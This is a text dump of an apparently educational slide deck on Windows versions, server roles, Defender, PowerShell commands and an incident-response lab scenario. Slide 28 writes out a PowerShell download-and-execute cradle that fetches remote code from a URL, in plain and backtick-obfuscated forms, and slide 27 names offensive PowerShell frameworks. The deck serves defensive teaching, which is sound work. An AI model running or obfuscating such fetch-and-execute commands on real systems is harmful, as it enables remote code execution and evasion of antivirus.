SLIDE 1
SUMMARY
▶ History ▶ End of life ▶ CLI ▶ Services ▶ Security Considerations ▶ PowerShell ▶ Incident Response
SUMMARY History End of life CLI Services Security Considerations - - PowerPoint PPT Presentation
SUMMARY History End of life CLI Services Security Considerations - - PowerPoint PPT Presentation
SUMMARY History End of life CLI Services Security Considerations PowerShell Incident Response BRIEF HISTORY (WINDOWS CLIENT) MSDOS (1980) WINDOWS (1985) WINDOWS 3.1 (1992) Windows 95 (1995)
SLIDE 2
SLIDE 3
BRIEF HISTORY (WINDOWS CLIENT)
▶
MSDOS (1980)
▶
WINDOWS (1985)
▶
WINDOWS 3.1 (1992)
▶
Windows 95 (1995)
▶
Windows ME (2000)
▶
Windows XP (2001)
▶
Windows Vista (2006)
▶
Windows 7 (2009)
▶
Windows 8 (2012)
▶
Windows 10 (2015)
SLIDE 4
BRIEF HISTORY (WINDOWS SERVER)
▶ Windows NT (1993) ▶ Windows NT 4.0 (1996) ▶ Windows Server 2003 ▶ Windows Server 2008 ▶ Server 2012 ▶ Server 2016 ▶ Server 2019 (2018)
SLIDE 5
MARKET SHARE
SLIDE 6
END OF LIFE
▶ Windows 7 (2020) ▶ Windows 8.1 (2023)
SLIDE 7
END OF LIFE
SLIDE 8
KERNEL TYPES
SLIDE 9
KERNEL
SLIDE 10
COMMAND LINE INTERFACE (CLI)
SLIDE 11
COMMAND LINE INTERFACE (CLI)
SLIDE 12
SERVICES
*Fixes 99% of printer problems
SLIDE 13
WINDOWS SERVER
SLIDE 14
SERVER CORE
SLIDE 15
ACTIVE DIRECTORY (AD)
SLIDE 16
ACTIVE DIRECTORY (AD)
SLIDE 17
DOMAIN NAME SERVICE (DNS)
SLIDE 18
DYNAMIC HOST CONFIGURATION PROTOCOL(DHCP)
SLIDE 19
FILE TRANSFER PROTOCOL (FTP)
SLIDE 20
INTERNET INFORMATION SERVICES (IIS)
SLIDE 21
SERVER MESSAGE BLOCK (SMB)
SLIDE 22
DOMAIN NAME SERVICE (DNS)
SLIDE 23
GROUP POLICY OBJECTS (GPO)
SLIDE 24
SECURITY CONSIDERATIONS
SLIDE 25
WINDOWS DEFENDER
▶ Built into Windows ▶ Behavior based/Signature based
SLIDE 26
WINDOWS DEFENDER
SLIDE 27
POWERSHELL BASED EXPLOITATION
▶ “Living off the land” ▶ Open Source Tools
▶
Bloodhound
▶
Empire (BC-Security Branch)
▶
Powerup
▶
PoshC2
▶
Death Star
▶
https://github.com/PowerShellMafia
▶
And more…
SLIDE 28
OBFUSCATION AND POWERSHELL
▶ -nop == -nopr == -noprof == -noprofile ▶ Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” +
“bit.ly/sample”) ==
▶ `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
“`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)
SLIDE 29
POWERSHELL EXECUTION POLICIES
▶ Not intended to be a security feature
SLIDE 30
POWERSHELL LOGGING
▶ Only possible in V5 ▶ Very powerful
SLIDE 31
TOPPLING THE EMPIRE
SLIDE 32
WHEN SIGNATURE DETECTION FAILS
SLIDE 33
BEHAVIOR DETECTION SUCCEEDS
SLIDE 34
WINDOWS DEFENDER + GROUP POLICIES
SLIDE 35
WINDOWS DEFENDER + GROUP POLICIES
SLIDE 36
SLIDE 37
POWERSHELL COMMANDS
▶ Get-Service
▶
Lists services running or stopped
SLIDE 38
POWERSHELL COMMANDS
▶ Start-Service <servicename> ▶ Stop-Service <servicename>
▶
Start/Stop service
▶
- Ex. Start-Service DNS
SLIDE 39
POWERSHELL COMMANDS
▶ sc.exe start <servicename> ▶ sc.exe stop <servicename>
▶
Start/Stop service
SLIDE 40
POWERSHELL COMMANDS
▶ Set-Service –Name <serviceName> -StartupType <startupType>
▶
Automatic (Delayed)
▶
Automatic
▶
Manual
▶
Disabled
SLIDE 41
POWERSHELL COMMANDS
▶ Get-MpComputerStatus
▶
Gets the status of antimalware software on system
SLIDE 42
POWERSHELL COMMANDS
▶ Get-Process
▶
List Processes
SLIDE 43
POWERSHELL COMMANDS
▶ Clear
▶
Clear Screen
SLIDE 44
POWERSHELL COMMANDS
▶ More info https://docs.microsoft.com/en-us/powershell/
SLIDE 45
INCIDENT RESPONSE
Hands on
SLIDE 46
SCENARIO
▶
Device: 1x breached Active Directory Server
▶
Brute force attack detected by intrusion detection system at 9/9/2020 at 0900 EST
▶
Defender scan ran following attack no malicious programs found ▶
Credentials
▶
Username: NIMITZ\Administrator
▶
Password: Change.me!
SLIDE 47
RELEVANT EVENT LOGS
SLIDE 48
EVENT LOG
SLIDE 49
EVENT LOG
SLIDE 50
EVENT LOG
SLIDE 51
EVENT LOG
SLIDE 52
EVENT LOG
SLIDE 53
EVENT LOG
SLIDE 54
RELEVANT POWERSHELL LOGS
SLIDE 55
POWERSHELL LOGS
SLIDE 56
POWERSHELL LOGS
SLIDE 57
POWERSHELL LOGS
SLIDE 58